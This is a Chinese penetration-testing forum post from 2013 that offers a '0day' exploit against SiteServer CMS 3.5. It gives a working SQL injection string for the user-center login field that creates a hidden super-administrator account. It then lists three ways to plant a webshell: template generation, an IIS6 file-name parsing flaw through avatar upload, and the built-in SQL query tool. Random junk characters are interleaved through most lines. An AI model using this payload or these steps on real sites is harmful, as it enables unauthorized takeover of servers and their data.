中国网络渗透测试联盟

标题: SiteServer CMS 0Day [打印本页]
作者: admin    时间: 2013-1-11 21:10
标题: SiteServer CMS 0Day
经测试秒杀最新的3.5版
4 [# S  Z# ^( R/ d! ^) Q# |. |# v- Z4 Y2 S) R
stieserver官网:www.siteserver.cn
* `" w2 L/ d5 E7 ^
4 c6 k! L" {1 L# E. r5 c " s) H  j! S! U6 j% c  n3 n
6 m4 l" ?0 J$ u5 G7 R
EXP:
7 a* W5 h3 j9 x, {6 b; L+ A/ U- ^2 E& \0 O" w) ~- z9 B7 Z
直接访问UserCenter/login.aspx' z+ H; }- H4 R/ b- R# o) Y
) l9 [) v4 \$ I1 ^6 o
9 e  t5 ]9 m7 k8 e( ~6 s: L6 x
4 s( m3 w0 b* u$ R. k/ V
用户名处输入:2 e( b* D) I6 v

: C6 E8 I( J+ s* l& _123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
; k% O' v5 l0 x+ h; V# c; `, g- k' Q# |0 }$ G. T1 W( J) ?

( r- R- r& b* f5 a/ H9 ?/ g
4 \' ]* O- O3 _" Z密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
0 h; D# L1 {! ^( x- |8 @2 Q5 U3 ]$ a$ N/ m

% w" n2 K6 Y0 R- q# q# w# g
9 U; V' U0 p7 a5 b  v2 |! C) `/ K之后再访问后台SiteServer/login.aspx用插入的用户登陆, M  b8 |6 T0 O9 x  K

% N$ M0 \4 ~" v  J
- z! h8 m* X) A- q* U- N
0 z2 i) I" }6 \0 \* E2 v后台拿webshell的三种方法:6 f! S+ @& i' u+ d! X+ Q' j

/ y. w$ R, o- [3 l一、
1 K, }# W. W- C: M6 M( F, O) N0 r5 m  I! {
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
. A  T3 l# ~, T, z- m) d' @
: K# g9 W3 E* Q二、* O  Y, B7 I% x& q( p

4 l- \8 L2 {. n5 B" f6 y1 t/ a" v4 _成员权限-》添加用户-》用户名为:1.asp$ l, O# A5 M- ^; j& A  S$ X  D0 r  h
& l' O3 H+ |% ?7 \
http://127.0.0.1/usercenter// V+ {0 T* X, S, A2 R. M! E6 ]
* p  ^& y5 x2 C4 {, ^( g  Y
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell+ }! s  z+ r, N9 _/ E

" z% x, `* v: B( {2 c(ps:后台添加用户时不会验证是否含有非法字符)! K- M6 t% {0 Y  k. K" f

% a/ e2 h3 ^/ C8 x5 S1 q三、: U" C( j( ^0 ]0 ~  K( j# z5 j- _* i

7 |$ k0 G8 B4 p9 R/ X" i系统工具-》实用工具-》机器参数查看
* J3 \! B8 w6 l% _3 r% W可以看到数据库类型、名称,WEB路径/ L' u' l5 ^( z5 f
( c6 h9 k- O% g0 P1 z8 s) a
系统工具-》数据库工具-》SQL语句查询
4 n$ Z( _# z0 r1 B/ a这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
" \/ N' w# g% J$ G: U% P2 y. j% X0 x4 w* X" ~1 T) _




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2